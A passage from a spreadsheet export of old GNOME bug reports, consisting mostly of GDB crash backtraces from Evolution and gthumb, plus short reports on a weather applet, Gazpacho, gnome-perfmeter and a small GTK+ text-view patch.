#45 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
#46 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#47 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#48 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#49 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#50 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#51 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
#52 0x40d344d3 in gtk_hpaned_new () from /usr/lib/libgtk-x11-2.0.so.0
#53 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
#54 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#55 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#56 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#57 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#58 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#59 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
#60 0x40e3cd7a in gtk_vbox_new () from /usr/lib/libgtk-x11-2.0.so.0
#61 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
#62 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#63 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#64 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#65 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#66 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#67 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
#68 0x40e593fe in gtk_plug_get_id () from /usr/lib/libgtk-x11-2.0.so.0
#69 0x403e40cf in bonobo_plug_set_control () from
/usr/lib/libbonoboui-2.so.0
#70 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
#71 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#72 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#73 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#74 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#75 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#76 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
#77 0x403e770b in bonobo_socket_add_id () from
/usr/lib/libbonoboui-2.so.0
#78 0x403ddda0 in bonobo_control_frame_get_remote_window ()
   from /usr/lib/libbonoboui-2.so.0
#79 0x403e6da1 in bonobo_socket_disposed () from
/usr/lib/libbonoboui-2.so.0
#80 0x41128d77 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#81 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#82 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#83 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#84 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#85 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#86 0x40e44593 in gtk_widget_realize () from
/usr/lib/libgtk-x11-2.0.so.0
#87 0x40e44388 in gtk_widget_map () from /usr/lib/libgtk-x11-2.0.so.0
#88 0x40d04280 in gtk_container_get_focus_hadjustment ()
   from /usr/lib/libgtk-x11-2.0.so.0
#89 0x40ccf8ec in gtk_bin_get_type () from /usr/lib/libgtk-x11-2.0.so.0
#90 0x40d02264 in gtk_container_forall () from
/usr/lib/libgtk-x11-2.0.so.0
#91 0x40d042cb in gtk_container_get_focus_hadjustment ()
   from /usr/lib/libgtk-x11-2.0.so.0
#92 0x41128d77 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#93 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#94 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#95 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#96 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#97 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#98 0x40e4434e in gtk_widget_map () from /usr/lib/libgtk-x11-2.0.so.0
#99 0x40e47dd0 in gtk_widget_set_parent () from
/usr/lib/libgtk-x11-2.0.so.0
#100 0x40d79afb in gtk_notebook_insert_page_menu ()
   from /usr/lib/libgtk-x11-2.0.so.0
#101 0x40d790ee in gtk_notebook_append_page ()
   from /usr/lib/libgtk-x11-2.0.so.0
#102 0x08081425 in e_shell_view_get_corba_interface ()
#103 0x080817a9 in e_shell_view_get_corba_interface ()
#104 0x08081955 in e_shell_view_display_uri ()
#105 0x0807e39e in e_shell_view_menu_setup ()
#106 0x411704fc in g_main_context_wakeup () from
/usr/lib/libglib-2.0.so.0
#107 0x4116db35 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#108 0x4116eb78 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#109 0x4116ee8d in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#110 0x4116f58f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#111 0x40477328 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#112 0x0809757c in main ()
#113 0x420156a4 in __libc_start_main () from /lib/tls/libc.so.6
Thread 6 (Thread 1116949808 (LWP 8641)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x4009c63a in e_thread_busy () from
/usr/lib/evolution/1.3/libeutil.so.0
No symbol table info available.
#2  0x40764332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 1125342512 (LWP 8642)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x4009c63a in e_thread_busy () from
/usr/lib/evolution/1.3/libeutil.so.0
No symbol table info available.
#2  0x40764332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 1133735216 (LWP 8643)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x4009c63a in e_thread_busy () from
/usr/lib/evolution/1.3/libeutil.so.0
No symbol table info available.
#2  0x40764332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 1142127920 (LWP 8644)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x4009c63a in e_thread_busy () from
/usr/lib/evolution/1.3/libeutil.so.0
No symbol table info available.
#2  0x40764332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 1150520624 (LWP 8645)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x4009c63a in e_thread_busy () from
/usr/lib/evolution/1.3/libeutil.so.0
No symbol table info available.
#2  0x40764332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 1093582080 (LWP 8640)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x4022cfa7 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0xffffe002 in ?? ()
No symbol table info available.
#4  0x42028b93 in abort () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x41175c08 in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x41175c44 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x40794279 in gnome_canvas_get_item_at ()
   from /usr/lib/libgnomecanvas-2.so.0
No symbol table info available.
#8  0x407941f4 in gnome_canvas_get_item_at ()
   from /usr/lib/libgnomecanvas-2.so.0
No symbol table info available.
#9  0x40791980 in gnome_canvas_new_aa () from
/usr/lib/libgnomecanvas-2.so.0
No symbol table info available.
#10 0x40793860 in gnome_canvas_set_scroll_region ()
   from /usr/lib/libgnomecanvas-2.so.0
No symbol table info available.
#11 0x403593e8 in set_header_canvas_width () from
/usr/lib/libgal-2.0.so.2
No symbol table info available.
#12 0x403598eb in table_canvas_reflow_idle () from
/usr/lib/libgal-2.0.so.2
No symbol table info available.
#13 0x40359a1c in table_canvas_size_allocate () from
/usr/lib/libgal-2.0.so.2
No symbol table info available.
#14 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x41128983 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#20 0x40dbea79 in gtk_table_get_homogeneous ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#23 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#24 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#25 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#26 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#27 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#28 0x40d9d7a6 in gtk_scrolled_window_get_shadow_type ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#29 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#30 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#31 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#32 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#33 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#34 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#36 0x40dbea79 in gtk_table_get_homogeneous ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#37 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#38 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#39 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#40 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#41 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#42 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#43 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#44 0x40e3f0e0 in gtk_vpaned_new () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#45 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#46 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#47 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#48 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#49 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#50 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#51 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#52 0x40d344d3 in gtk_hpaned_new () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#53 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#54 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#55 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#56 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#57 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#58 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#59 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#60 0x40e3cd7a in gtk_vbox_new () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#61 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#62 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#63 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#64 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#65 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#66 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#67 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#68 0x40e593fe in gtk_plug_get_id () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#69 0x403e40cf in bonobo_plug_set_control () from
/usr/lib/libbonoboui-2.so.0
No symbol table info available.
#70 0x41129814 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#71 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#72 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#73 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#74 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#75 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#76 0x40e450cc in gtk_widget_size_allocate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#77 0x403e770b in bonobo_socket_add_id () from
/usr/lib/libbonoboui-2.so.0
No symbol table info available.
#78 0x403ddda0 in bonobo_control_frame_get_remote_window ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#79 0x403e6da1 in bonobo_socket_disposed () from
/usr/lib/libbonoboui-2.so.0
No symbol table info available.
#80 0x41128d77 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#81 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#82 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#83 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#84 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#85 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#86 0x40e44593 in gtk_widget_realize () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#87 0x40e44388 in gtk_widget_map () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#88 0x40d04280 in gtk_container_get_focus_hadjustment ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#89 0x40ccf8ec in gtk_bin_get_type () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#90 0x40d02264 in gtk_container_forall () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#91 0x40d042cb in gtk_container_get_focus_hadjustment ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#92 0x41128d77 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#93 0x41116247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#94 0x41115ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#95 0x4112820f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#96 0x411279a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#97 0x41127be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#98 0x40e4434e in gtk_widget_map () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#99 0x40e47dd0 in gtk_widget_set_parent () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#100 0x40d79afb in gtk_notebook_insert_page_menu ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#101 0x40d790ee in gtk_notebook_append_page ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#102 0x08081425 in e_shell_view_get_corba_interface ()
No symbol table info available.
#103 0x080817a9 in e_shell_view_get_corba_interface ()
No symbol table info available.
#104 0x08081955 in e_shell_view_display_uri ()
No symbol table info available.
#105 0x0807e39e in e_shell_view_menu_setup ()
No symbol table info available.
#106 0x411704fc in g_main_context_wakeup () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#107 0x4116db35 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#108 0x4116eb78 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#109 0x4116ee8d in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#110 0x4116f58f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#111 0x40477328 in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#112 0x0809757c in main ()
No symbol table info available.
#113 0x420156a4 in __libc_start_main () from /lib/tls/libc.so.6
No symbol table info available.
#0  0xffffe002 in ?? ()
Unknown reporter: jerome_krough@yahoo.com changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>jerome_krough</t>
  </si>
  <si>
    <t>GNOME-APPLETS-164700</t>
  </si>
  <si>
    <t>night icon during the day</t>
  </si>
  <si>
    <t>for Italy -&gt; Monte Argentario atm the update time 12:55 sunrise 07:41 sunset
17:14 and it displays a night icon ...</t>
  </si>
  <si>
    <t>GAZPACHO-323478</t>
  </si>
  <si>
    <t>Unremovable placeholders</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Create a window
2. Add a vbox or hbox to the window
3. Select the hbox in the widget view
4. Press delete
Expected behavior:
A new placeholder is created which you can select
Actual behavior:
A new placeholder is created which you cannot be selected :-)</t>
  </si>
  <si>
    <t>GPERFMETER-97212</t>
  </si>
  <si>
    <t>[Solaris] Meter's not placed properly after invoking with -H option</t>
  </si>
  <si>
    <t>I'm running Sun's Stable build 12 version of Gnome. Gnome perfmeter 
sources are checked out using the timestamp Tue Oct 15 15:00:00 BST 2002.
I invoked the perfmeter by providing the '-H' command line option (display 
horizontal meters). It displayed the 'CPU' meter. I then opened the other 
meters one by one (i.e. Load Disk Page Context Job Swaps etc). After 
the fourth meter the gnome perfmeter window does not get resized 
automatically to show the newly added meter. 
I also tried to invoke gnome perfmeter with all meters on and in 
horizontal form as: 
'gnome-perfmeter --all -H'
Even in this case some of the names of the meters were overlapping with 
one another. (will be attaching a screenshot)</t>
  </si>
  <si>
    <t>anand.subra</t>
  </si>
  <si>
    <t>GTK+-51097</t>
  </si>
  <si>
    <t>PATCH to gtk_text_view_set_border_window_size(..) bug</t>
  </si>
  <si>
    <t>The gtk_text_view_set_border_window_size(..)
is broken if you create the border window (setting size &gt; 0)
after the widget has been realized.
Here is a patch fixing the problem...
------------------------ CUT HERE -----------------------------
--- gtktextview.c	Sun Feb 18 09:13:44 2001
+++ gtk+/gtk/gtktextview.c	Sun Feb 18 09:16:08 2001
@@ -55536 +555310 @@
           *winp = text_window_new (type
                                    GTK_WIDGET (text_view)
                                    width 0)
+          /* if the widget is already realized we need to realize the
child manually */
+          if (GTK_WIDGET_REALIZED (text_view))
+            text_window_realize (*winp
+                         GTK_WIDGET(text_view)-&gt;window)
         }
       else
         {
@@ -55876 +559111 @@
           *winp = text_window_new (type
                                    GTK_WIDGET (text_view)
                                    0 height)
+
+          /* if the widget is already realized we need to realize the
child manually */
+          if (GTK_WIDGET_REALIZED (text_view))
+            text_window_realize (*winp
+                         GTK_WIDGET(text_view)-&gt;window)
         }
       else
         {
--------------------------- CUT HERE ------------------------------------</t>
  </si>
  <si>
    <t>mikeh</t>
  </si>
  <si>
    <t>GTHUMB-101125</t>
  </si>
  <si>
    <t>gthumb crash when I try to convert images</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gthumb
Severity: normal
Version: 1.105
Synopsis: gthumb crash when I try to convert images
Bugzilla-Product: gthumb
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.0.6)
Description:
Description of Problem:
gthumb crash when I try to convert a series of images
Steps to reproduce the problem:
1.  select many images
2. convert
3. 
Actual Results:
crash
Expected Results:
convert images :)
How often does this happen?
always
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/gthumb'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New
Thread 16384 (LWP 4300)]
[New Thread 32769 (LWP 4301)]
[New Thread 16386 (LWP 4302)]
[New Thread 32771 (LWP 4303)]
[New Thread 49156 (LWP 4304)]
[New Thread 65541 (LWP 4305)]
[New Thread 81926 (LWP 4306)]
[New Thread 98311 (LWP 4307)]
[New Thread 114696 (LWP 4308)]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0x40d14269 in wait4 () from /lib/libc.so.6
#0  0x40d14269 in wait4 () from /lib/libc.so.6
#1  0x40d873c4 in sys_sigabbrev () from /lib/libc.so.6
#2  0x40b2ec75 in waitpid () from /lib/libpthread.so.0
#3  0x40095723 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#4  0x40b305a7 in __pthread_sighandler () from /lib/libpthread.so.0
#5  0x40c9fbd8 in sigaction () from /lib/libc.so.6
#6  0x08064f81 in tools_convert_format_command_impl ()
#7  0x40110c45 in bonobo_socket_add_id () from
/usr/lib/libbonoboui-2.so.0
#8  0x40af0e1b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#9  0x4067dc7b in bonobo_closure_invoke_va_list ()
   from /usr/lib/libbonobo-2.so.0
#10 0x4067de91 in bonobo_closure_invoke () from
/usr/lib/libbonobo-2.so.0
#11 0x40110ac1 in bonobo_socket_add_id () from
/usr/lib/libbonoboui-2.so.0
#12 0x40681453 in Bonobo_UIComponent_execVerb () from
/usr/lib/libbonobo-2.so.0
#13 0x4011696b in bonobo_ui_engine_get_ui_container ()
   from /usr/lib/libbonoboui-2.so.0
#14 0x40116b21 in bonobo_ui_engine_get_ui_container ()
   from /usr/lib/libbonoboui-2.so.0
#15 0x40b060e2 in g_cclosure_marshal_VOID__POINTER ()
   from /usr/lib/libgobject-2.0.so.0
#16 0x40af11f5 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#17 0x40af0e1b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#18 0x40b04d7a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#19 0x40b031fa in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#20 0x40b034a5 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#21 0x40118c1f in bonobo_ui_engine_emit_verb_on_w ()
   from /usr/lib/libbonoboui-2.so.0
#22 0x4011d58c in bonobo_ui_sync_menu_add_popup ()
   from /usr/lib/libbonoboui-2.so.0
#23 0x40b05786 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#24 0x40af0e1b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#25 0x40b04983 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#26 0x40b031fa in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#27 0x407d1faf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#28 0x4085250c in gtk_widget_activate () from
/usr/lib/libgtk-x11-2.0.so.0
#29 0x407a85fa in gtk_menu_shell_activate_item ()
   from /usr/lib/libgtk-x11-2.0.so.0
#30 0x407a7abb in _gtk_menu_shell_activate () from
/usr/lib/libgtk-x11-2.0.so.0
#31 0x4079cd82 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#32 0x40af11f5 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#33 0x40af0e1b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#34 0x40b04d7a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#35 0x40b03267 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#36 0x407d1faf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#37 0x4085243d in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
#38 0x408520a0 in gtk_widget_event () from /usr/lib/libgtk-x11-2.0.so.0
#39 0x4079cc33 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
#40 0x4079bc3e in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#41 0x4091a0dc in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#42 0x40b93b29 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#43 0x40b94947 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#44 0x40b94d23 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#45 0x40b953ff in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#46 0x4066f9df in bonobo_main () from /usr/lib/libbonobo-2.so.0
#47 0x08088374 in main ()
#48 0x40c8ea5f in __libc_start_main () from /lib/libc.so.6
Thread 9 (Thread 114696 (LWP 4308)):
#0  0x40c9fce2 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40b2c6df in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40b29173 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401a7e9f in gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#4  0x401a7eee in gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#5  0x40ba9300 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x40b2a06f in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 8 (Thread 98311 (LWP 4307)):
#0  0x40c9fce2 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40b2c6df in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40b29173 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x0809fd9f in image_loader_set_pixbuf ()
No symbol table info available.
#4  0x40ba9300 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0x40b2a06f in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 7 (Thread 81926 (LWP 4306)):
#0  0x40c9fce2 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40b2c6df in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40b29173 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x0809fd9f in image_loader_set_pixbuf ()
No symbol table info available.
#4  0x40ba9300 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0x40b2a06f in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 6 (Thread 65541 (LWP 4305)):
#0  0x40c9fce2 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40b2c6df in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40b29173 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x0809fd9f in image_loader_set_pixbuf ()
No symbol table info available.
